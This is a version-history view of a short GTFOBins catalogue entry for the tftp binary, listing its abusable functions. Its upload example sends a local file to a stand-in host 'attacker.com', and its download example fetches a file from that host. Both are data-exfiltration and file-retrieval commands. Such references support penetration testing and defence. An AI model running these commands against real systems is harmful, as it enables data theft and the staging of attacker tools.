GTFOBins.github.io/_gtfobins/tftp.md

16 lines
304 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
upload:
2018-07-04 20:26:52 +02:00
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
put file_to_send
2018-05-21 21:14:41 +02:00
download:
2018-07-04 20:26:52 +02:00
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
get file_to_get
2018-05-25 01:10:39 +02:00
---